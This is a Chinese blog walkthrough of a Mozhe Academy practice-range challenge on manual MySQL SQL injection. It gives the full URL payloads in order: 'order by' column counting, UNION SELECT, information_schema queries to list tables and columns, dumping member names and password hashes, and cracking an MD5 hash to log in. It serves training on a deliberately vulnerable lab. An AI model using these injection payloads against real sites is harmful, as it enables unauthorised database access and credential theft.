墨者学院—SQL手工注入漏洞测试(MySQL数据库)解题

最新推荐文章于 2024-07-13 15:16:45 发布
最新推荐文章于 2024-07-13 15:16:45 发布
阅读量343 收藏 2
点赞数 1
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42453864/article/details/119317584
版权

墨者学院—SQL手工注入漏洞测试(MySQL数据库)解题过程

实验目的:

在这里插入图片描述
实验过程:

  1. 打开后,点“点击访问”

在这里插入图片描述
在这里插入图片描述

  • 点击上图的红色标注“关于平台停机维护的通知”,打开如下:
    在这里插入图片描述
    对于上图红色标注处,我们开始手工sql注入过程:
  • 判断注入:猜解列名数量(字段数) order by x 错误与正常的正常值
    order by +(我们猜测的,此处我们猜测4,可以跳转成功,但猜测5不行,如下图)
  219.153.49.228:48354/new_list.php?id=1 order by 4

猜测4可成功显示
在这里插入图片描述

  • 报错猜解准备:使用union
219.153.49.228:48354/new_list.php?id=1 union select 1,2,3,4
219.153.49.228:48354/new_list.php?id=-1 union select 1,2,3,4

在这里插入图片描述
在这里插入图片描述

  • 开始找操作系统、版本号等
    信息收集:
操作系统版本:version()             5.7.22-0ubuntu0.16.04.1
数据库名字:database()            mozhe_Discuz_StormGroup
数据库用户:user()                root@localhost
操作系统:@@version_compile_os    Linux

通过下面查询语句可以得到上述数据库版本、数据库用户、操作系统等
在这里插入图片描述
在这里插入图片描述

  • 查询指定数据库名:mozhe_Discuz_StormGroup下表名信息:
219.153.49.228:48354/new_list.php?id=-1 union select
1,group_concat(table_name),3,4 from information_schema.tables where
table_schema='mozhe_Discuz_StormGroup'

在这里插入图片描述

  • 查询指定表名StormGroup_member下的列名信息:
219.153.49.228:48354/new_list.php?id=-1 union select
1,group_concat(column_name),3,4 from information_schema.columns where
table_name='StormGroup_member'

在这里插入图片描述

  • 查询指定数据:求出name和passward
http://219.153.49.228:48354/new_list.php?id=-1 union select
1,name,password,4 from StormGroup_member

在这里插入图片描述
上述密码用md5解出来登陆不上,在后面加上限制条件limit 1,1
在这里插入图片描述

  • 用md5解密
    在这里插入图片描述

  • 登陆
    在这里插入图片描述
    在这里插入图片描述
    提交key就可以了

盼汝
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_46694260的博客
03-27 3899
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入。同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟一个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看一下目 这里通过目我们知道,这次SQL注入是字符型的SQL注入 那我们就进入靶场环境 可以看到和上次一样,有一个登录系统,登录框下面有一个维护新闻轮播框 我们点进去
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
多崎巡礼的博客
07-26 3237
很简单,可以完全参照 https://blog.csdn.net/qq_42357070/article/details/81215715 进行解题 以下用cms站点举例: https://pan.baidu.com/s/1uiO2cqZCGquQqyYWr0C7WQ     提交and 1=1 返回内容正常        And 1=2 返回内容为空 确定存在注入漏...
墨者学院SQL注入解题
qq_46111881的博客
11-06 1739
一·判断注入 输入id=1,正常返回。输入id=-1返回错误。由 此可知存在注入。 二·判断字段 URL id=-1 order by 1 URL id=-1 order by 2 URL id=-1 order by 3 URL id=-1 order by 4 URL id=-1 order by 5 此时报错,说明有四个字段 三·使用union查询注入点 输入union select 1,2,3,4 发现2,3为显注点 四·使用database()查库名 输入 union select 1,
零基础学习手工SQL注入墨者学院靶场)
ISNS的博客
07-08 1674
靶场:https://www.mozhe.cn/bug/detail/82 1.点击滚动的通知: 页面跳转至: 2.判断是否为注入点。 发现这是一个注入点。 3.判断字段数量。 从10开始,采用二分法,直至确定字段数量为4: 4.判断可显字段。 输入联合查询语句以后,发现页面还是显示的之前的内容,于是让它原本的语句错误,这样它就不显示之前的页面了: 可以看到,可显字段为第二个和第三个...
墨者学院-入门级-SQL手工注入漏洞测试(MySQL数据库)-小白必看(超详细)
kitiu666的博客
04-26 1040
2021年2月2日,第八次渗透测试。 这次实践SQL的盲注,知识点比较多,除了实验的讲述还会加上知识点的讲解; 测试寻找注入口: 1,、进入靶场,发现界面和之前做过的实验一样,我们需要进入“维护通知的地址”进行说起来的注入; 2、我们直接进在地址栏进行SQL语句的注入测试; 在地址栏加上语句“and 1=1”,页面可以正常显示。再尝试加入语句“and 1=2”,页面显示出错,没有了相关内容。说明地址栏是一个sql 的一个注入口;(原理说明可以看我之前做过的实验博客) sql语句注入: 3、发现了注入
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1)、PHP代码分析溯源(第2)、PHP逻辑漏洞利用实战(第1)、SQL手工注入漏洞测试(Access数据库)
WebShell文件上传漏洞分析溯源
02-22
2. 渗透测试:通过渗透测试来检测Web应用程序是否存在文件上传漏洞。 3. 漏洞扫描:使用漏洞扫描工具来检测Web应用程序是否存在文件上传漏洞。 六、WebShell 文件上传漏洞的实践案例 在这个实践案例中,我们使用...
spring IOC实现(墨者革离)
12-12
在这个名为"spring_IOC实现(墨者革离)"的项目中,我们可以通过模拟城门叩问的编剧场景来理解这一概念。 首先,控制反转的基本思想是将对象的创建和依赖关系的管理从应用程序中分离出来,交给一个外部容器(在...
墨者未必黑.pdf
12-26
墨者未必黑.pdf
墨者安全专家 v3.7.2.9
03-12
3、墨者漏洞修补 通过全面扫描windows和软件中存在的系统漏洞,一键完成补丁的下载与安装,及时排除系统的安全隐患。 4、墨者保护隐私 及时清理上网历史记录、网银注册信息、系统临时文件及cookies等,全面保护个人...
墨者学院 - SQL手工注入漏洞测试(Sql Server数据库)
多崎巡礼的博客
07-27 6891
手工SQL注入过程,数据库执行的语句,是页面提交至服务器应用程序,应用程序获取id的值,然后把值拼接到查询语句中,在到数据库中查询,通过程序解析后,把结果返回在页面上,(使用时请将mozhe.cn替换成对应的靶场地址)。 开启靶场环境: 第1步: 页面提交:http://mozhe.cn/new_list.php?id=2 数据库执行语句:select * from manage w...
墨者-SQL注入漏洞测试(报错盲注)
wh1sper、的博客
07-04 650
墨者-SQL注入漏洞测试前言一、sqlmap二、手注1.报错注入2.时间注入3.联合查询union被过滤总结 前言 本墨者学院在线靶场 进入目发现是个登录界面,找了好久,最后在关于平台停机维护的通知的页面找到了注入点 判断注入类型,当输入?id=1’ and 1=1 %23时,页面显示正常。 ?id=1' and 1=1 %23 当输入?id=1’ and 1=2 %23时,页面显示不正常。 由此判断注入类型为单字符注入。 一、sqlmap 首先先清理sqlmap的缓存。 python sq
墨者学院解题思路之电子数据取证-流量分析(第1)+wireshak导出图片、视频等文件
伪娘+
04-04 1458
墨者学院解题思路之电子数据取证-流量分析(第1) +wireshak导出图片、视频等文件 背景介绍 某web安全工程师在网络中捕获到一段可疑流量,发现有人将机密数据隐藏在图片中传输了出去,你能分析出其中的奥秘吗? 实训目标 1、掌握“wireshark”的基本使用方法; 2、了解数据在网络中传输的过程和协议; 解题方向 使用“wireshark”过滤语句过滤流量。 思路:wireshark是分析...
墨者学院解题思路-密码学加解密实训(JavaScript分析)+代码分析详解
伪娘+
04-05 513
墨者学院解题思路-密码学加解密实训(JavaScript分析)+代码分析详解 背景介绍 一个最普通的HTML页面,可能也会存在信息泄露。查看一下页面源代码吧 实训目标 1、了解查看页面源代码; 2、代码分析; 解题方向 查看HTML页面的源代码。 思路:主要是分析代码,以下是代码详细解释。 提示里说看源代码,所以右键查看源代码,发现主要是JavaScript里的判定。 <script l...
如何用IP地址申请SSL证书实现网络安全
2401_84891336的博客
07-10 404
申请IP地址SSL证书
网络安全防御【防火墙NAT智能选举综合实验】
最新发布
miss_copper的博客
07-13 928
需要新创建一个源地址转池:这里我们将配置黑洞路由勾选(防止路由环路,还可以引入到OSPF等动态路由协议中发布出去),允许端口地址转换取消勾选(因为我们这里是多对多的NAT,源NAT地址转换,如果勾选了端口地址转换,就成了端口映射,成了目标NAT)这种方式可以提高安全性,因为攻击者无法预测目标设备的确切IP地址。首先修改公网client5,和分公司server5和client6的域名服务器地址,并且公网中的server4(NDS服务器)开启DNS服务,和分公司的server5开启http服务器。
网络安全防御【防火墙安全策略用户认证综合实验】
miss_copper的博客
07-10 1236
先新建一个管理员角色(网络安全管理员):再新建一个管理员(用户名密码自拟):至此本实验全部结束!!!
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值